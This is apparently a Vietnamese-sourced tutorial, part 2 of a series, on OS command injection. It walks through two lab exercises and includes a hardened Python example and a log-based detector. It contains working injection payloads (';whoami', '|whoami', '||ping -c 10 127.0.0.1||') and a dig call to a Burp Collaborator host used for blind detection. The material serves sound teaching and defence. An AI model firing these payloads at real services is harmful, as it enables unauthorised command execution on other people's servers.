OS command injection vulnerabilities (Part 2)

Tram Ho

II. Analysis and exploitation of OS command injection vulnerabilities (continued)

3. Common OS command injection vulnerabilities

Consider a shopping website that includes a function to check the quantity of a product left in stock, using the following URL:

https://insecure-website.com/stockStatus?productID=381&storeID=29

The website inserts the productID and storeID values it receives into a shell command, as follows:

stockreport.pl 381 29

The output of the command is returned in the user interface. Note that both parameters, productID and storeID, are controlled by the user, so this mechanism can be abused to mount a command injection attack. An attacker can pass the value & echo aiwefwlguh & in the productID parameter. The shell statement then becomes:

stockreport.pl & echo aiwefwlguh & 29

Because of how the shell treats the & character (discussed above), this line is actually three commands executed simultaneously: stockreport.pl, echo aiwefwlguh, and 29. The interface then returns the following results:

In the first line, the stockreport.pl command fails because its parameters are missing; the second command succeeds; the third command, 29, is not found and produces an error. Only the result of the second command matters: the string aiwefwlguh in the output means the echo command was executed, which confirms that the command injection vulnerability can be exploited.

Lab analysis: OS command injection, simple case


Description: The website contains a command injection vulnerability in the function that checks the remaining quantity of a product. The application passes the user-supplied productId and storeId parameters to a shell command on the server and returns the command's output to the user. To solve the lab, we need to execute the whoami command, which returns the name of the current user on the server.

In the product detail view, the Check stock function lets users check how many units of the product remain in stock.


Observe the request in Burp Suite:


We see that the request uses the POST method and passes two parameters, productId and storeId, to the system. Both values can be changed arbitrarily by the user.

Because the system passes these parameter values directly into the shell command, we can change a value to execute arbitrary shell commands. For example, the id command prints the user ID (uid), the group ID (gid) and the groups the user belongs to.

Now, when the system executes the shell command that retrieves the remaining stock, it also executes the injected id command and returns the result uid=12001(peter-CUXeyH) gid=12001(peter) groups=12001(peter):


Some payloads we can use:

  • Payload 1: Terminate the command with ; and then execute whoami: productId=1&storeId=1;whoami


  • Payload 2: Pipe the command into whoami with |: productId=1&storeId=1|whoami


  • Payload 3: Break the command with %0d (a URL-encoded carriage return):


There are many other payloads for you to learn!
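As an added example (not code from the page or the lab), here is the stock-check command built the insecure way, a string handed to a shell, next to a hardened version that validates both ids against an allow-list and passes an argv list with no shell involved. The validation rules and the Python wrapper are assumptions; the stockreport.pl script is never executed here.

```python
import re
import subprocess

# Added example (not the page's code). Assumed: both ids are short decimal numbers and
# stockreport.pl is the program the page describes; the script is not run in this demo.
ID_RE = re.compile(r"[0-9]{1,9}")


def vulnerable_command(product_id: str, store_id: str) -> str:
    """Builds the command line the way the insecure site does: user input is pasted into
    a string that is later handed to /bin/sh, so & ; | and CR/LF are parsed as operators."""
    return f"stockreport.pl {product_id} {store_id}"


def shell_would_split(command: str) -> bool:
    """True if the string contains a shell control operator, i.e. the shell would run
    something other than the single intended stockreport.pl invocation."""
    return re.search(r"[&;|\r\n`]|\$\(", command) is not None


def hardened_argv(product_id: str, store_id: str) -> list:
    """Allow-list validation plus an argv list. Because the list is passed to
    subprocess.run with shell=False, no shell parses it and there is nothing to inject."""
    if not ID_RE.fullmatch(product_id):
        raise ValueError("invalid productId")
    if not ID_RE.fullmatch(store_id):
        raise ValueError("invalid storeId")
    return ["stockreport.pl", product_id, store_id]


def is_accepted(product_id: str, store_id: str) -> bool:
    """Does the hardened validation accept this pair of values?"""
    try:
        hardened_argv(product_id, store_id)
    except ValueError:
        return False
    return True


def run_hardened(product_id: str, store_id: str) -> str:
    """How the hardened site would invoke the script (needs stockreport.pl on PATH)."""
    proc = subprocess.run(hardened_argv(product_id, store_id), shell=False,
                          capture_output=True, text=True, timeout=10, check=False)
    return proc.stdout


if __name__ == "__main__":
    for payload in ["29", "& echo aiwefwlguh &", "1;whoami", "1|whoami", "1\rwhoami"]:
        line = vulnerable_command("381", payload)
        print(f"{line!r}: shell splits={shell_would_split(line)} "
              f"hardened accepts={is_accepted('381', payload)}")
```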

4. Blind OS command injection vulnerability

While studying the functions that can lead to OS command injection above, we saw that some functions return the command output in the browser, while others only execute the command and show no output, or reveal it only indirectly through other data such as log entries. OS command injection behaves the same way: the website does not always return the output of the injected shell command as clearly as in the case above. That does not mean there is no OS command injection vulnerability. This type of vulnerability is called a blind OS command injection vulnerability.

Consider a website with a function that lets users fill in personal information when placing an order; the user enters an email address and an order confirmation is sent to that address. To do this, the website runs a mail program that takes the user's email address as input, as follows:

mail -s "Content of Email" -aFrom:peter@normal-user.net notification@vulnerable-website.com

In this case the website will of course not return the output of any shell command the user injects. So the question is: how can we test for this, and what signs help us identify this kind of "blind" vulnerability?

5. Check for Blind OS command injection vulnerabilities with time delays

We can test for this vulnerability by injecting a command that delays the system's response. By observing the application's response time we can confirm that the command was executed. The ping command is a good choice in this case:

& ping -c 10 127.0.0.1 &

The above command causes the application to ping localhost for ten seconds.

Lab analysis: Blind OS command injection with time delays


Description: The website contains a blind command injection vulnerability in the user feedback function; the command output is not displayed. The system executes shell commands on the server with user-supplied parameters. To solve the lab, we need to exploit the vulnerability so that the system delays its response by ten seconds.

The Submit feedback function allows users to enter name, email, subject and message. These values are passed to the system via the POST method:



To check whether the system has a command injection vulnerability, we can use the dig command to perform a DNS lookup and check whether the lookup reaches our server. Several such domains are available for free. Here I use Burp Collaborator, with the domain name 8s1uu77drmsnrws11qcmew82nttrhg.burpcollaborator.net, and append ;dig+8s1uu77drmsnrws11qcmew82nttrhg.burpcollaborator.net to each parameter in turn:


The email parameter produces a successful DNS lookup, so the email value is used in the shell command on the server. We can now use the ping command to delay the system by ten seconds:

Payload: email=hacker%40gmail.com||ping+-c+10+127.0.0.1||
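As an added example (not from the page), the defender's side of sections 4 and 5: detection logic that flags the kind of probes shown here, a shell operator inside a decoded request parameter, a known probe command such as ping or dig, or a slow response that matches a time-delay payload. It runs over a constructed application log; the log format and the placeholder collaborator hostname are assumptions.

```python
import re
from urllib.parse import parse_qsl

# Added example (not the page's code). Assumed log format, one request per line:
#   <timestamp> <method> <path> <response_ms> <urlencoded body>
SHELL_META = re.compile(r"[;&|`\r\n]|\$\(")          # shell control operators
PROBE_CMDS = re.compile(r"\b(ping|dig|nslookup|sleep|whoami|id)\b")
SLOW_MS = 9000  # a slow response plus a metacharacter suggests a time-delay probe

# Constructed sample log; the collaborator hostname is a placeholder.
SAMPLE_LOG = """\
2024-03-01T10:00:00Z POST /feedback/submit 120 name=Peter&email=peter%40normal-user.net&subject=Hi&message=Thanks
2024-03-01T10:00:05Z POST /feedback/submit 10021 name=a&email=hacker%40gmail.com%7C%7Cping+-c+10+127.0.0.1%7C%7C&subject=x&message=y
2024-03-01T10:00:07Z POST /product/stock 95 productId=1&storeId=1%3Bwhoami
2024-03-01T10:00:09Z POST /product/stock 90 productId=381&storeId=29
2024-03-01T10:00:11Z POST /feedback/submit 130 name=a&email=x%40y.net%3Bdig+PLACEHOLDER.burpcollaborator.net&subject=s&message=m
"""


def analyse_line(line: str) -> list:
    """Return one finding per parameter whose decoded value contains a shell operator.
    Severity rises if the value names a known probe command or the request was slow."""
    ts, _method, path, dur_ms, body = line.split(" ", 4)
    findings = []
    for key, value in parse_qsl(body, keep_blank_values=True):
        if not SHELL_META.search(value):
            continue
        kind = "metachar"
        if PROBE_CMDS.search(value):
            kind = "probe-command"
        if int(dur_ms) >= SLOW_MS:
            kind = "time-delay"   # the blind-injection signal this section is about
        findings.append({"ts": ts, "path": path, "param": key, "kind": kind})
    return findings


def scan(log: str) -> list:
    """Run analyse_line over every non-empty line of the log."""
    return [f for line in log.splitlines() if line.strip() for f in analyse_line(line)]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```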


Source : Viblo